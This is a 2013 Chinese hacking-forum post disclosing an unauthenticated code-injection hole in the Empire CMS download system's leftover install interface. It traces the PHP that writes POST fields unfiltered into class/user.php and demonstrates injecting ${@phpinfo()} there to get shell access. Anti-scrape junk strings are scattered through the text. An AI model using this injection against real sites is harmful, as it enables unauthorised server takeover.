找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2667|回复: 0
打印 上一主题 下一主题

帝国万能接口漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 09:34:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
% }+ O- R; X' o# j& o$ A! G9 L0 F
. `  s: x4 [4 |" Q4 V8 W* G

- ~* m7 f7 s2 G+ Q9 W8 h
这是帝国的一套下载系统 如图
2 T/ M, e8 n& i0 a6 y$ ^ps(不需要任何账户和密码,直接写shell)

# V- g9 r( N9 I# K: a3 F

由于很多站是由于下载要整合discuz 等等一些论坛..... ~+ [' m/ i/ O# {; B7 b5 d


! q9 r6 u: _- |3 _! c" w: B

而帝国他又有一个万能接口,如图


9 S( Q7 ~) R( W+ }3 o: r+ w9 I
4 r+ b4 w8 q) M$ ~, b  b# @
- ~6 ]5 w( r1 ?

而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码
! G/ o, k% h- t* A1 X* ]
" f* V, N6 e& I# L1 F) h8 z/ r  @5 I当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig

1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}

复制代码

他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪. @; _( T) i7 P7 b1 ^6 E

3 P+ p, n  D0 |8 U  E2 r在data/fun.php中的15行
3 w4 H1 v  a* x4 k0 m0 w
! ]+ }; e; i% x4 L$ T8 ~( T% @我们可以看到这个函数

1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {
2 B5 @/ g0 A. j8 y8 v# l
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);

复制代码

.....//省略若干/ x/ W( b. o; f2 O8 b+ y. y6 y
# v7 U1 Q* j) {0 ^& p
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);, w$ {. @# _6 V/ ^+ u4 x
8 t+ j4 n+ z; @7 g& J, X& b
他将传进来的变量进行了切割,然后赋给了$filetext
1 C  @& D! J5 `0 k* k, ?& a8 [9 A/ A1 _" m$ b
然后看下面

1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
6. }
7. @fputs($fp,$filetext);

复制代码

打开了一个class/user.php文件,然后将$filetext写入了% n, s2 M9 F, ?! a

3 _! [6 D  m% h  G4 ?我们看看写入的结果,随便填一个

# q6 D3 w. @* u1 v- F

  @' a3 i1 e1 Y
7 B. h/ i! w: ]" `; L* A9 w- p/ ]  X$ S+ e  p' K  ~+ B

+ b5 y- \! Z1 K! x! o" M& @
7 s  `; W% ~( }$ Q* c

2 B" W9 r' U6 `% r6 m

; Y6 `; b% D7 o, Q8 f$ q

3 W, b& G) J( Q" W, \/ T, u: O/ {: q! |8 L& p+ I1 V7 |
9 Y: V  ~8 Q( I$ k6 H1 D" Y% ~+ u
# m" b( Q# P1 Y% l) W& i

& l1 E/ q# t1 q# {: f* }" B4 r2 ~
" X; D' u! y, O6 J! ~

( N# d) j$ k9 i$ e! ^) Z, B" [, z9 K: F  l) R% F( d
& g+ \+ A6 e( Q( t5 N, ~7 }. {

# Q" w! I  v- Z" |) w5 g% J4 f: H: d* k/ k& U  d5 q$ D
& ?# `8 _0 d/ \$ t, L) H: {
; l/ \6 f) E. ]) h8 G2 m

4 K, r2 y6 H* r! d- M

所以我们淫荡点,写个${@phpinfo()}试试

3 V6 s2 I# q5 o( }* v3 c4 E* E6 f

然后访问以下class/user.php这个文件( o' }( ]. T; N/ _0 ]
日了吧


& a  h8 D1 s3 e% @& x2 [+ h* U

2 ^" X. Y& C* Y, G9 i7 Q8 D: k
$ B9 O; t8 J* l0 R* o
/ x  {) j1 G0 v2 i+ T
* v3 s* Z% _! m+ d! Y

2 B3 _4 W7 e1 _0 ^

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表